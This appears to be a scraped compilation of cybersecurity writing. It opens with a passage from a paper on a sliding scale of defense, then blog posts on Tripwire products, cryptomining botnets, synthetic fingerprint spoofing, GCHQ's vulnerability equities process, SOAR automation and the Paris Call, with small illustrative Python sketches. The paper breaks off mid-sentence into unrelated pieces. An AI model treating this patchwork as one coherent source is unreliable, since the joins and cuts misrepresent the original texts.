The scale's categories are not equally important to security either, as this paper's comparison of Architecture with Offense makes plain. Building and implementing systems with security in mind markedly improves their defensive posture, and toward the same security goal those measures return far more on investment than offense does. A sufficiently advanced and determined attacker will always find a way around even a sound architecture, so investment should not be confined to architecture alone. Every category on the scale matters; organizations should let expected return on investment guide how they pursue security and when to attend to other categories. For instance, an organization that has neglected Architecture and Passive Defense will find Active Defense of little value; such an organization should fix the basics before considering intelligence or offense.

To meet its security goals, an organization should build a security foundation and culture and keep refining them, so its defenders can adjust in the face of threats and challenges and defend better. The sliding scale can thus also advance an organization's security maturation. The organization should focus first on the left-hand categories to build the corresponding base, then invest in the categories to the right. Sound investment in the Architecture phase lays the groundwork for effective Passive Defense afterward and yields greater returns. Active Defense, in turn, is easier and more effective when deployed in an environment with sound architecture and passive defenses; without that security base, active-defense activities like security monitoring and incident response become difficult and costly. Cost highlights each category's return on investment, as Figure 2 shows. For example, to execute offensive action effectively, one must at minimum make use of threat intelligence, which requires the organization to fully understand its security measures in the Active Defense, Passive Defense, and Architecture phases and to identify and counter the threats it faces. Yet offensive action delivers far less value to an organization than properly built and implemented architecture. We therefore strongly recommend that organizations concentrate on the phases on the left of the sliding scale, starting with Architecture.



Figure 2: Cost versus security value

Architecture

Architecture: planning, building, and maintaining systems with security in mind.

One of the most important aspects of security is building systems properly, matched to the organization's mission, funding, and staffing. Architecture means planning, building, and maintaining systems with security in mind. Secure system design is the foundation; only on top of it can the other aspects of cyber security be built. Moreover, architecture built sensibly for the organization's needs raises the efficiency and lowers the cost of the scale's other phases. If, say, the network is poorly segmented and not maintained with software patches, the resulting pile of security problems can leave defenders struggling to keep up, burying the threats that truly need identifying, such as network attackers, under miscellaneous security issues, commodity malware, and network configuration problems born of the poor architecture.

Architecture usually starts with planning and designing systems to support organizational needs. The organization should first identify the business goals its IT systems must support, which may vary by company and industry; system security should support those goals. The aim of the architecture phase is not to defend against attackers but to meet the needs of both normal and emergency operating conditions, including the occasional malware infection, network traffic spikes from misconfigured systems, and outages systems cause one another merely by being deployed on the same network. All of these situations, and more, are entirely common in the normal environment of today's connected infrastructure. Designing systems with them in mind preserves confidentiality, availability, and integrity in support of the organization's business requirements.

Secure system construction, procurement, and implementation are another key element of Architecture. Quality-control measures must be enforced, and protecting every link in the chain matters. Combined with system maintenance such as applying security patches, these measures make systems easier to defend. Applying software and hardware patches is sometimes mistaken for a defensive measure; in fact it is not one in itself, but it promotes security. The practices associated with sound architecture also shrink the attack surface, minimizing attackers' opportunities to enter the system, and constraining their behavior should they get in anyway.

Below are several sample models that serve as references for implementing the practices of this category.

Sample architecture model: NIST Special Publications, 800 series

NIST's 800-series Special Publications offer multiple guides on the secure procurement, design, implementation, and hardening of systems. Although system architecture is driven by intended outcomes and system requirements, the publications remain valuable guidance. Of particular note is SP 800-137, "Information Security Continuous Monitoring for Federal Information Systems and Organizations," which advises organizations to monitor their networks continuously and proactively, identifying and promptly remediating security violations and vulnerabilities before attackers can exploit them.

Purdue Enterprise Reference Architecture

The Purdue Model is an example of a high-level architecture model for industrial control system networks. It illustrates the need to divide and isolate network segments by function; proper segmentation markedly improves a network's defensibility.

Payment Card Industry Data Security Standard (PCI DSS)

PCI DSS is an information-security standard for organizations that handle particular types of credit cards and their associated data. Some of its requirements concern passive defenses such as firewall implementation, but most aim at sound architecture: requirements such as developing and maintaining secure systems, encrypting data, restricting access to cardholder data, and never using vendor-supplied default passwords all help achieve it.

Passive Defense

Once an organization has built a sound security foundation by investing in the model's Architecture category, investing in passive defenses becomes essential. Passive Defense sits atop Architecture and provides systems with protection from attack. An attacker or threat with malicious intent and the capability to do harm will, given the chance, bypass the architecture no matter how sound it is, which is why passive defense is necessary. Before defining it, some history of the term.

Defense has traditionally been divided into passive and active. From the 1930s through the 1980s (before the term "cyber" existed), the definitions of these two terms were hotly disputed. The US Department of Defense ended the long dispute by defining passive defense as: measures taken to reduce the probability of, and to minimize the damage caused by, hostile action, without the intention of taking the initiative. Whether that definition transfers to the cyber security domain has been debated by scholars, practitioners, and military professionals ever since. The definition may look easy to understand, but applying it to the normal operating environment of the cyber domain is not as simple as its words suggest.

Carrying the term from the military domain to the cyber domain requires understanding its real meaning, not its literal definition. In the original debates, passive defense meant providing protection against attack without interaction by military units: hardening fortifications against missile bombardment, for example. Although that may look like patching a system, it is closer to reinforcing a structure than to repelling an attack; it is therefore not defense but an acknowledgment of the system's typical environment, and patching is a maintenance measure. Likewise, weatherproofing a military briefing room against harsh conditions is not "passive defense against wind" but normal behavior required by that environment. Hardened barriers, decoys, camouflage, and other secondary measures for the room are passive defense. One last point: the physical world involves resource depletion. Attackers consume physical resources; every bomb dropped is one fewer. In the digital world, attackers do not consume resources this way: a piece of malware that goes undetected and uncountered will be reused again and again. What attackers do spend in this case is time, supporting resources, and manpower. Depleting an attacker's resources, including the time needed to plan and achieve their malicious aims, is vital to the defender, and passive defense helps accomplish exactly that.

Passive Defense: systems added to the architecture that provide consistent threat protection and detection without constant human interaction.

The history of the term suggests a conclusion: protection can be achieved by adding attachments to the structure. The idea of defending against attack without necessarily strengthening the system's own capability leads to the definition of passive defense. In the physical world, passive defense likewise requires no frequent human interaction. Passive Defense is therefore defined as: systems added to the architecture that provide consistent threat protection and insight without constant human interaction. Sample systems added to the architecture, such as firewalls, anti-malware systems, intrusion prevention systems, antivirus, intrusion detection systems, and similar traditional security systems, protect assets, close or narrow known security gaps, reduce the opportunities for interaction with threats, and provide threat insight and analysis. Such systems need periodic maintenance, replacement, and upkeep rather than constant human interaction to operate; they may run continuously, yet not always in an effective protective state. Several models already offer advice on deploying systems of this kind.

Recommended passive defense model: Defense in Depth

Defense in depth is a foundational concept for implementing passive defense on top of the system architecture. The model is an outline for ensuring passive-defense systems span the entire network. It also ties directly to the concept of adversary resource depletion: dividing the defense into multiple layers forces attackers to invest more time and effort to achieve their goals. This requires, however, that the layered defenses not merely reuse the same technology, for identical layers, once bypassed, can no longer cost the attacker any time.

NIST Special Publications, 800 series

NIST's 800 series also provides multiple documents on implementing passive defense. SP 800-41, 800-83, and 800-94, covering firewalls, anti-malware systems, and intrusion detection and prevention systems, deserve special attention.

NIST Cybersecurity Framework

The NIST Cybersecurity Framework lays out a roadmap to help organizations defend against threats, spanning architecture, passive defense, and active defense; its chief contribution, though, is its advice on how to correctly implement and use passive defenses. The framework is an excellent reference model offering organizations directional guidance.

Active Defense

Passive defense mechanisms will ultimately fail against determined, well-resourced adversaries. Countering such technically advanced, single-minded opponents requires proactive security measures, and well-trained defenders to match well-trained attackers. Crucially, those defenders must be empowered and assured of operating within a security architecture that is protected and monitored by well-deployed passive defenses. When it comes to cyber security, however, media and news organizations routinely misuse the term "active defense" and construe it however they please. Given how often the term is misused, its historical background deserves a closer look.

In the 1970s, the US Army's use of "active defense" in discussing land warfare sparked fierce debate. General William E. DePuy, first commander of the Army Training and Doctrine Command, used the term in a 1974 article on the 1973 Arab/Israeli war. There he spoke of the defender's dynamic rather than static fighting capability: "This means the defender must have the capability to maneuver and must conduct an active defense of the battle area." He later elaborated on the term's concept: active defense means tightly integrated combined-arms teams and task forces supporting one another, fighting from successive positions throughout the battle area, striking the attacker continuously until the attacker is worn down. He incorporated the term into the 1976 US Army Field Manual 100-5, "Operations." General DePuy later noted that "active defense" drew so much criticism because the terminology in the Field Manual was misunderstood, even though the manual is credited with setting the Army's post-Vietnam doctrinal precedent. As he put it: "the term 'active defense' appeared only in passing, as an adjective, in 100-5, and rarely in 71-2. In 71-1, however, 'active defense' became the official descriptor for the defensive principles prescribed in that series of manuals. But, as we shall see, there was no consensus on what the term meant."

The military's disagreement over the term mirrors its current use in the cyber security domain. The US military has, however, adopted an official definition of "active defense" for military operations (not cyber security). For conventional warfare, "active defense" means: the employment of limited offensive action and counterattacks to deny a contested area or position to the enemy. The word "counterattack" appears here, and in cyber security people have misread it literally as "hacking back." That was never the term's intent. Simply copying terms from the physical domain of warfare into cyber security, it turns out, does not accurately carry their meaning across. "Active defense" has always been about maneuverability: the ability to combine military intelligence and indicators to identify attacks and to respond to attacks, or counter capabilities, within the defended or contested area, plus the ability to learn from the engagement. A RAND study begun in 1965 highlighted this in discussions of using integrated air-defense systems to track intercontinental ballistic missiles (ICBMs) and destroy them before they struck their targets. The point to note for cyber security is that the "counterattack" occurs only inside the defended area, and what is countered is a capability, not the adversary. That is, the cyber security "counterattack" is best embodied in incident response, where personnel "fight back" by containing and remediating threats. Incident responders and their colleagues do not attack the adversary in the adversary's own networks or systems, just as the integrated air-defense active-defense mechanisms against ICBMs destroy only the missile, not the person who launched it or the city that person lives in.

Against that background and understanding, "active defense" in cyber security can be defined as: the process by which analysts monitor, respond to, and learn from threats internal to the network, and apply that knowledge. The final phrase "internal to the network" matters, further dispelling the misreading of "counter" as "hacking back." The analysts who carry out this mission include incident responders, malware reverse engineers, threat analysts, network security monitoring analysts, and others who use their own environment to hunt for adversaries and respond to them.

The focus on analysts rather than tools introduces a proactive approach to security and highlights the original strategy's intent: maneuverability and adaptability. A system by itself cannot provide active defense; it can only serve as a tool for active defenders. Likewise, an analyst merely sitting in front of a tool such as a security information and event manager does not become an active defender. This is about actions and processes, and staffing and training matter as much as anything. What makes advanced threats persistent and dangerous is the adaptive, intelligent adversary behind the keyboard; fighting such adversaries requires defenders who are just as flexible and clever.



Figure 3: The Active Cyber Defense Cycle

Recommended active defense model: the Active Cyber Defense Cycle

The Active Cyber Defense Cycle is a model created by this paper's author and is the subject of study in SANS ICS515, "Active Defense and Incident Response."

It consists of four phases of action forming a continuous process for proactively monitoring, responding to, and learning from attacks. The four phases are: threat intelligence consumption; asset identification and network security monitoring; incident response; and threat and environment manipulation, as shown in Figure 3.

Network Security Monitoring

Network security monitoring (NSM) was ultimately defined as a set of actions by Todd Heberlein in the 1980s, when he developed the Network Security Monitor system to detect network intrusions. Other analysts subsequently popularized and extended the NSM concept. Notably, Richard Bejtlich's work expanded the field, especially The Tao of Network Security Monitoring, which brought NSM wide attention. Although NSM is one component of the Active Cyber Defense Cycle, it is a model in its own right, an approach to active defense. The approach highlights the value of analysts detecting adversaries inside their own environment and can drive incident response around attack campaigns rather than single intrusions.

Intelligence

Intelligence: the process of collecting data, exploiting it into information, and assessing it to fill previously identified knowledge gaps.

One secret to effective active defense is the ability to use intelligence about attackers and, through it, to drive security changes, processes, and actions in the environment. Consuming intelligence is part of active defense, but producing intelligence belongs to the Intelligence category. It is in this phase that analysts, using various methods, collect data about the attacker from a variety of sources,

Tripwire Products: Quick Reference Guide


Here at The State of Security, we cover everything from breaking stories about new cyberthreats to step-by-step guides on passing your next compliance audit. But today, we'd like to offer a straightforward roundup of the Tripwire product suite.

Get to know the basics of Tripwire’s core solutions for FIM, SCM, VM and more. Without further ado…

SCM and FIM: Tripwire Enterprise

Tripwire’s flagship product is the industry standard for integrity monitoring and security configuration management. It’s essentially a security configuration management (SCM) suite that provides fully integrated solutions for policy, file integrity monitoring (FIM) and remediation management.

The suite lets IT security, compliance and IT operations teams rapidly achieve a foundational level of security throughout their IT infrastructure by reducing the attack surface, increasing system integrity and delivering continuous compliance.

Tripwire Whitelist Profiler

You can augment Tripwire Enterprise with a number of add-ons like Tripwire Whitelist Profiler, which helps bridge the IT/OT gap by giving operational specialists better visibility into environments like industrial control systems (ICS) . ICS operators regularly find themselves needing to manage device-specific policies―a task made difficult when they only have default reporting tools at their disposal.

Tripwire Whitelist Profiler enables you to report on both authorized and unauthorized settings based on your whitelist: your set of permitted ICS settings. It also lets you verify that only approved users exist on your systems at any given time.

Tripwire Malware Detection

Tripwire Malware Detection is another extension of Tripwire Enterprise that identifies malware as soon as it is introduced into your system. Should any unwarranted changes appear on the critical servers monitored with Tripwire Enterprise, Tripwire Malware Detection can immediately inspect the changed or new file to identify malicious behavior.

Tripwire Malware Detection spins up suspicious files into a protected sandbox environment for inspection and produces a comprehensive PDF report of its findings.
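Stripped to its core, the file integrity monitoring that Tripwire Enterprise productizes is a cryptographic-hash baseline plus a later comparison. A minimal standard-library sketch of that idea (our illustration, not Tripwire's implementation; real FIM also tracks permissions, owners, and other attributes):

```python
import hashlib
import tempfile
from pathlib import Path

def snapshot(paths):
    # Baseline: SHA-256 of every monitored file's contents.
    return {str(p): hashlib.sha256(Path(p).read_bytes()).hexdigest()
            for p in paths}

def changed(baseline, paths):
    # Files whose current hash differs from the baseline (or that vanished).
    now = snapshot(p for p in paths if Path(p).exists())
    return sorted(p for p in baseline if baseline[p] != now.get(p))

with tempfile.TemporaryDirectory() as d:
    cfg = Path(d) / "server.cfg"
    cfg.write_text("port=443\n")
    baseline = snapshot([cfg])

    cfg.write_text("port=8443\n")     # simulated unauthorized change
    print(changed(baseline, [cfg]))   # reports server.cfg as modified
```

Everything beyond this, scheduling, policy, who approved which change, and the remediation workflow, is where commercial FIM products earn their keep.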

Botnets Are Being Repurposed for Crypto Mining Malware: Kaspersky


A security bulletin released by Kaspersky Labs states that botnets are increasingly being used to distribute illicit crypto mining software.

In the note, analysts for the cybersecurity firm said Wednesday that the number of unique users attacked by crypto miners grew dramatically in the first three months of 2018. Such malware is designed to secretly reallocate an infected machine’s processing power to mine cryptocurrencies, with any proceeds going to the attacker.

According to Kaspersky, more users were infected in September than in January and “the threat is still current,” though it is unclear whether the recent collapse in the crypto markets’ prices will have an impact on the infection rate.

The firm’s analysts said that a noticeable drop in distributed denial of service (DDoS) attacks may be attributable to “the ‘reprofiling’ of botnets from DDoS attacks to cryptocurrency mining.”

As the note detailed:

“Evidence suggests that the owners of many well-known botnets have switched their attack vector toward mining. For example, the DDoS activity of the Yoyo botnet dropped dramatically, although there is no data about it being dismantled.”

A possible explanation for cybercriminals’ increased interest in crypto-mining may lie in the fact that once the malware is distributed, it’s difficult for victims and police to detect.

Of the various types of software identified and cataloged, most reconfigure a computer’s processor usage to allocate a small amount to mining, keeping users from noticing.

The organization further looked into reasons for the prevalence of this type of malware in some regions over others, concluding that regions with a lax legislative framework on pirated and illicitly distributed software are more likely to have victims of cryptojacking.

U.S. users were the least affected by the attacks, constituting 1.33 percent of the total number detected, followed by users in Switzerland and Britain. However, countries with lax piracy laws like Kazakhstan, Vietnam and Indonesia topped the list.

“The more freely unlicensed software is distributed, the more miners there are. This is confirmed by our statistics, which indicates that miners most often land on victim computers together with pirated software,” the report said.

Image via Shutterstock


How AI and Machine Learning Can Fool Biometric Sensors


Both my phone and my tablet have fingerprint sensors. For some reason, my tablet never reads my fingerprint correctly, so I find I have to try multiple times before giving up and using another method of authentication to log on. But my phone’s sensor has worked great, allowing me quick access to my apps and giving me a sense of privacy that no one else can pick up my phone and use it.

However, fingerprints as a biometric authentication solution isn’t foolproof, and researchers from New York University and Michigan State University recently presented a paper on how easy it is to create synthetic fingerprints that can trick biometric sensors.


Suddenly, my phone―or anything that relies on fingerprint scans―doesn’t seem as private.

Already a Flawed Scan

I think it is important to point out that fingerprint sensors on our phones and tablets are already a flawed security protection. As the researchers explained, the sensors are so small that they only grab a small part of the fingerprint. This means that naturally, the chance of “matching” with another fingerprint increases. This concept led to something called MasterPrints, which the researchers didn’t develop but described: “MasterPrints are a set of real or synthetic fingerprints that can fortuitously match with a large number of other fingerprints. Therefore, they can be used by an adversary to launch a dictionary attack against a specific subject that can compromise the security of a fingerprint-based recognition system. This means, it is possible to ‘spoof’ the fingerprints of a subject without actually gaining any information about the subject’s fingerprint.”

The researchers then went a step beyond MasterPrints with DeepMasterPrints: “Images that are visually similar to natural fingerprint images.” This is the print that can spoof any type of fingerprint sensor, matching it to a number of different fingerprint identities. It is essentially the master key of fingerprints, and it could create chaos in a security world that sees biometric authentication as the most secure option available right now.

Using AI and ML to Generate Fingerprints

As The Guardian explained, the researchers used two particular properties of fingerprints and sensor technology to come up with DeepMasterPrints. First, it took advantage of the partial print scan done on smaller devices. Second, it used fingerprint features that are common as opposed to unique; in other words, our fingerprints are more alike than we realize. Then, the article stated, “the researchers used a common machine learning technique, called a generative adversarial network, to artificially create new fingerprints that matched as many partial fingerprints as possible.”
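The first property, partial scans, can be demonstrated with a toy simulation. The model below is entirely ours and purely illustrative (real minutiae are not independent random bits), but it shows why shrinking the sensor's window inflates the chance that two unrelated prints "match":

```python
import random

random.seed(0)

def rand_print(n=64):
    # Toy "fingerprint": n binary minutiae features.
    return [random.randint(0, 1) for _ in range(n)]

def partial_match(stored, probe, window):
    # A small sensor sees only `window` features; accept if the probe's
    # pattern appears anywhere in the stored print (partial matching).
    pattern = probe[:window]
    return any(stored[i:i + window] == pattern
               for i in range(len(stored) - window + 1))

def false_match_rate(window, trials=1000):
    # Chance that two unrelated prints "match" at this sensor size.
    return sum(partial_match(rand_print(), rand_print(), window)
               for _ in range(trials)) / trials

for w in (4, 8, 16):
    print(w, false_match_rate(w))
# The smaller the window, the higher the accidental match rate --
# the statistical headroom that MasterPrints exploit.
```

A MasterPrint simply optimizes the probe so that its pattern is one of the most common ones, pushing the match rate well above even the random-probe baseline shown here.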

Dictionary Attacks, but for Fingerprints

How can synthetic fingerprints affect security? Just as hackers use dictionary attacks to generate potential passwords, the researchers concluded synthetic fingerprints could be used to launch dictionary-style attacks against systems that rely on this type of biometric authentication.

“Could” is the operative word here. It’s important to remember that this research was conducted in a controlled environment, proving synthetic fingerprints―and the science behind creating them―are possible.

“While that doesn’t invalidate the findings,” Sam Bakken, senior product marketing manager at OneSpan said in an email comment, “the costs of executing such an attack are far from negligible and attackers probably don’t see a good return-on-investment at this time.”

However, you know if it can be done in one setting, cybercriminals will work hard to replicate the findings for their own use. With this research, the rest of us are getting a bit of a head start to ensure our authentication systems are able to combat potential synthetic fingerprint hacks. That begins with a layered authentication that adds on to fingerprint biometrics.

“A layered approach might include taking into account additional contextual data (e.g., whether the authentication event is taking place on a compromised device or via an emulator, etc.) to score the risk associated with the transaction and if that risk is too high, ask the user to provide another authentication factor,” said Bakken.

Fingerprints are a popular biometric because they are easy for consumers to use―no passwords to remember and no added device necessary. But it is only a matter of time until they are no more secure than a user name and password combination.

Landmark GCHQ Publication Reveals Vulnerability Disclosure Process



“Our default is to tell the vendor and have them fix it. But sometimes, after weighing up the implications, we decide to keep the fact of the vulnerability secret and develop intelligence capabilities with it”

GCHQ and NCSC today for the first time published the decision making process they use to decide whether to retain a technology vulnerability for intelligence purposes, or disclose it to a vendor to be patched.

Release of the so-called Equities Process is a move of striking transparency for the traditionally secretive signals intelligence organisation. It comes amid growing pressure from vendors to disclose all such finds.

Equities Process: Wait, What?

The UK’s GCHQ, like other intelligence agencies globally, conducts vulnerability research seeking out flaws in technology that can be exploited for intelligence purposes, either by malicious actors, or UK intelligence.


GCHQ Director Jeremy Fleming. Credit: GCHQ

Many it refers back to vendors for “repair”; indeed the NCSC was named one of the top five bounty hunters under Microsoft’s “bug bounty” programme this year.

Some it holds on to for intelligence purposes.

Such nation-state retention of so-called 0days, or previously unknown vulnerabilities, has become increasingly controversial, however, after 0days stockpiled by governments leaked into the wild and were weaponised by "bad actors".

Read this: Microsoft Demands "Digital Peace" What Does It Really Want?

As Microsoft President Brad Smith last year put it: "The WannaCrypt exploits… were drawn from the exploits stolen from the National Security Agency, or NSA, in the United States. [They] provide yet another example of why the stockpiling of vulnerabilities by governments is such a problem. This is an emerging pattern…" He added: "Exploits in the hands of governments have leaked into the public domain and caused widespread damage. [We are calling for] governments to report vulnerabilities to vendors, rather than stockpile, sell, or exploit them."

Jaya Baloo, the CISO of the Netherlands' KPN Telecom, speaking at an event on critical infrastructure security earlier this year, was also blunt: "There is no vulnerabilities equity process. No sharing. If we want critical infrastructure security we need law enforcement and intelligence to share the info they know. Otherwise we are just creating both a white and a black market for vulnerabilities."


GCHQ Equities Process: Intelligence Capabilities Have Their Place…

In a blog published alongside a description of the decision-making process by which GCHQ and the NCSC decide whether or not to disclose such finds, Dr Ian Levy, the NCSC's technical director, however, said disclosing all finds would be "naive".

He wrote: “Our default is to tell the vendor and have them fix it. But sometimes, after weighing up the implications, we decide to keep the fact of the vulnerability secret and develop intelligence capabilities with it.”

He added: "There has to be a very good reason not to: either an overriding intelligence case, or the fact that disclosing could reduce the security of people who use the product (and we really do mean it). From an NCSC point of view, some of our best technical folk are involved in the day-to-day decision making, and a couple of us not involved in the day-to-day process are available to the Equity Technical Panel and the Equity Board to provide senior, independent technical advice if necessary.

"We've also asked the Investigatory Powers Commissioner, who oversees the use of statutory powers by GCHQ, to provide oversight of the process we run to make sure we're really taking the right things into account when making a decision. We think that provides world class assurance around this bit of our work," he noted.


The GCHQ Foyer

So, What's the Process?

There has to be "a clear and overriding national security benefit in retaining a vulnerability", GCHQ said. It uses a trio of entities to help determine this (and has also adopted the ISO 29147 approach to vulnerability disclosure, it said).

1: The Equities Technical Panel (ETP), made up of subject matter experts from across the UK Intelligence Community, including the NCSC.

2: The GCHQ Equity Board (EB), "which includes representation from other Government agencies and Departments as required". This is chaired by "a senior civil servant with appropriate experience and expertise, usually drawn from the NCSC".

3: The Equities Oversight Committee, chaired by the CEO of the NCSC, which "ensures the Equities Process is working… in accordance with specified procedures and which advises the NCSC's CEO on equity decisions escalated from the Equity Board."

Decision Criteria

In deciding whether to release or retain a vulnerability, GCHQ looks at these criteria:

Possible remediation. Consideration of the possible routes to mitigate the impact of the vulnerability, in particular focusing on whether there is a viable route to release, or whether releasing it would have a negative impact on national security.

Operational necessity. Consideration of the intelligence value to the UK in retaining the vulnerability, which includes the following questions:

- What operational value can be gained from this capability?
- What are the intelligence opportunities from this capability?
- How reliant are we on this vulnerability to realise intelligence?
- How likely is a disclosure to impact other operational capabilities or partners?

Defensive risk. An assessment of the impact on security of not releasing the vulnerability in the context of the UK and its allies, including Government departments, critical national infrastructure, companies and private citizens. This includes:

- How likely is it that this vulnerability is/could be discovered by someone else?
- How likely is it that this vulnerability could be exploited by someone else?
- What technology/sector is exposed if left unpatched?
- What is the potential damage if the vulnerability is exploited?
- Without a patch applied to the software, are other mitigation opportunities possible, such as configuration changes?

Ultimately, GCHQ concludes, although its starting point on discovering a vulnerability is to disclose it, retaining knowledge of the vulnerability "can be used to gather intelligence and disrupt the activ…
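As a purely hypothetical illustration, the weighing exercise these criteria describe could be modelled as a score. Every number, weight and threshold below is invented; the real decision is a human judgment made by the ETP, Equity Board and Oversight Committee described above.

```python
# Invented model of an equities weighing exercise. Inputs are 0-10
# judgments corresponding loosely to the published criteria.
def equities_decision(operational_value, rediscovery_likelihood,
                      exposure_severity, mitigations_available):
    """Return 'retain' or 'disclose'; the default leans to disclosure."""
    retain_case = operational_value
    disclose_case = rediscovery_likelihood + exposure_severity
    if mitigations_available:
        disclose_case -= 2  # config workarounds soften the defensive risk
    # "a clear and overriding national security benefit" is required,
    # so retention must beat disclosure by a margin, not merely tie it.
    return "retain" if retain_case > disclose_case + 3 else "disclose"

print(equities_decision(9, 2, 3, mitigations_available=True))
print(equities_decision(5, 7, 8, mitigations_available=False))
```

The asymmetric margin encodes the stated default: when in doubt, tell the vendor.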

SOAR Doesn’t Have Mood Swings


If you look back at how your cyberdefense centers have evolved, you'll realize that you've only thrown more eyeballs at the screen to deal with the ever-expanding threat landscape. The challenge for the current team is to stay afloat in this endless stream of alerts and identify, rank and respond to the most critical ones. Given that cybersecurity data doubles every year, you'd soon be looking at a real estate problem―you would need to house an exponentially increasing number of analysts to handle the exponentially growing number of alerts. What seems like a challenge today will be an impossible task tomorrow. Amid these non-stop threat notifications, you realize that it's only a matter of time until someone drops the ball.

SOC at Scale: That’s a Problem. Here’s Why

You have security information and event management (SIEM) systems that listen to the chatter from around the infrastructure. Hopefully, they help you connect the dots. Next, there are analysts at the security operations center (SOC) who crunch these alerts and validate threats, weeding out false positives and prioritizing events of interest. This process is easy if it works, but the reality is different. The ratio of false positives to meaningful alerts changes the game. Add to that our love for mindless notifications. This creates tremendous pressure on the SOC by requiring analysts to be "extra" attentive to ensure nothing slips through. Let's face it; it is painful to spend time analyzing alerts only to discover that some of them are not even real.

The equation is simple: more alerts require more analysts. You are now hunting for the right talent while trying not to settle for whatever is available. After you hire, you realize that this is just the beginning. Next, you start worrying about training them, helping them with the process and, finally, holding on to them. However, the fact remains that the more people in your SOC, the more it seems a mishap is just around the corner.

Same Problem, Different Outcomes

If you give the same incident to 30 analysts in a SOC, you are likely to see six different lines of investigation, four of which won't achieve the desired end goal. This is due to a skills gap, which also ensures you have a vibrant spread of reaction times in your weekly report. And because it is impossible to have all your analysts at the same skill level, you end up leaning on your superstar handlers during times of stress.

As a culture, analysts must continually be kept aware of the threat landscape and helped to build strategies to tackle these threats. While these strategies are sometimes standardized, most of the time threats are left to the good judgment of the handler.

The State of Mind is a Significant Contributor

Running a SOC is like managing a team that must win at all costs. As in a group, where having all members switched on at all times is a challenge, in a SOC, temperaments play a part in bringing out varying results from every individual. Laxity (and similar traits) in mundane tasks can result in significant breaches. Let’s also get practical here; even skilled analysts can make errors when inundated with this deluge.

Going from Machine to Machine

Validating an alert is critical because it is here that an alert becomes a possible threat. The process of validation can include multiple internal and external checks and cross-checks against other devices or endpoints.

Typically, the validation process accounts for about two-thirds of the time required for investigating a threat. Security orchestration, automation and response (SOAR) helps in connecting the threat management life cycle to API-driven service providers that respond with third-party intelligence on the threat. SOAR brings capabilities that validate threats internally and externally (using these third-party threat intelligence partners). Today, the majority of the validation checks done by analysts (including correlations) can be automated.

As per a study performed on MSSPs (predominantly servicing customers in India), it takes an average of 170 minutes from the time a threat is identified to the time a response action is initiated. This is because response is a manual process, and different levels of validation are performed before initiating a response action.

By chaining these response actions after an automated validation check, we can cut down the dwell time of an attacker significantly and save time spent in investigating mundane alerts.

Making SOAR Work for You

SOAR platforms allow binding validation and response plugins based on defined logic; these platforms have the benefit of integrating with various data providers and network and security components. The most effective way of implementing automation is to:

1. Collect past alerts and group similar threats.
2. Pick the threats that occur the most.
3. Notice the path of investigation and the combination of validations and responses analysts take for each threat type.
4. Mark validation and response blocks that can be automated.

After the first phase of automation, you could look at a more connected approach using security orchestration. Multiple playbooks can be connected, allowing investigations to automatically branch out into different directions. In a way, train systems to handle threats like humans.
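The mine-then-automate approach above can be sketched as follows. The threat types, validation checks and response actions are invented placeholders; a real playbook would call out to SIEM, sandbox and mail-gateway APIs.

```python
# Sketch of SOAR playbook automation: mine past alerts for the most
# frequent threat type, then chain automated validation and response
# blocks for it. All block names are hypothetical.
from collections import Counter

past_alerts = [
    {"type": "phishing"}, {"type": "phishing"}, {"type": "malware"},
    {"type": "phishing"}, {"type": "brute_force"}, {"type": "malware"},
]

# Steps 1-2: group similar threats and pick the most frequent.
top_threat, _ = Counter(a["type"] for a in past_alerts).most_common(1)[0]

# Steps 3-4: the validation/response blocks analysts use for that threat
# type, marked for automation and chained into a playbook.
def check_sender_reputation(alert): return "malicious"   # stub lookup
def detonate_attachment(alert): return "malicious"       # stub sandbox
def quarantine_mailbox(alert): return "quarantined"      # stub response

PLAYBOOKS = {
    "phishing": {
        "validate": [check_sender_reputation, detonate_attachment],
        "respond": [quarantine_mailbox],
    },
}

def run_playbook(alert):
    book = PLAYBOOKS[alert["type"]]
    verdicts = [step(alert) for step in book["validate"]]
    if all(v == "malicious" for v in verdicts):
        return [step(alert) for step in book["respond"]]
    return []  # inconclusive: escalate to a human analyst instead

actions = run_playbook({"type": top_threat})
print(top_threat, actions)
```

Chaining response directly after validation is what collapses the 170-minute manual gap cited earlier: the machine acts the moment the verdict is in.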

The Outcome

Introducing SOAR capabilities into your business is the beginning of quick decision-making and rapid response without human errors. SOAR is the best escape for analysts stuck in the maze of SIEM alerts. It enriches events to prevent false-positive alerts from lowering the sensitivity bar, streamlines your incident response workflows and improves overall security operations. After all, incident response times define effective cybersecurity.

After figuring out the exact steps in the human (as-is) process, as a part of SOAR, you can automate them to reduce the personnel workload by more than 41 percent. That means 410 out of every 1,000 alerts can be automated! Even the remaining 59 percent have contextual information added to assist analysis, enabling speedy and accurate decision-making. Security is no longer a trade-off between speed and accuracy.

Your SOC analysts will rock―minus the mood swings!

Perspectives on the ‘Paris Call’


“We the People of the United States, in Order to form a more perfect Union”

“Four score and seven years ago”

“I have a dream”

These are very well known quotes to every American. These quotes were opening salvos by great leaders who knew we had to come together for change and for good. Although the quotes I know off the top of my head are provincial, I also know that when there is a time that requires change, a time people must come together for good, we should be listening to great leaders around the world.

Earlier this month, French President Emmanuel Macron made the call to come together and address a global challenge, the need for data security in cyberspace. Without data security there can be no trust, bad actors can wreak havoc, and we the people can have our lives quickly turned upside down by hackers. There isn’t a day that goes by without news of how hackers, terrorists, and nation states are infiltrating the foundations of what President Macron defines as “information and communication technologies (ICT).”



Macron made the opening salvo to address this problem, globally and together, not only through piecemeal regulations. He rolled out the "Paris Call for Trust and Security in Cyberspace". He called for leaders to reaffirm "our support to an open, secure, stable, accessible and peaceful cyberspace, which has become an integral component of life in all its social, economic, cultural and political aspects."

Essentially, he is asking to apply the best practices we learned as a society from world wars and large-scale disasters to the new world of cyberspace. The document calls for leaders to condemn malicious cyber activities in peacetime, just as we do for traditional invasions and attacks on infrastructure and indiscriminate attacks on individuals. He asks that we support victims of malicious use of ICTs and that stakeholders cooperate to protect against and respond to such attacks.

The Paris Call lists out nine norms, all of which you can find in the link above. Here’s a sampling of three:

- Strengthen our capacity to prevent malign interference by foreign actors aimed at undermining electoral processes through malicious cyber activities
- Prevent ICT (information and communication technologies) enabled theft of intellectual property, including trade secrets or other confidential business information, with the intent of providing competitive advantages to companies or the commercial sector
- Strengthen the security of digital processes, products and services, throughout their lifecycle and supply chain

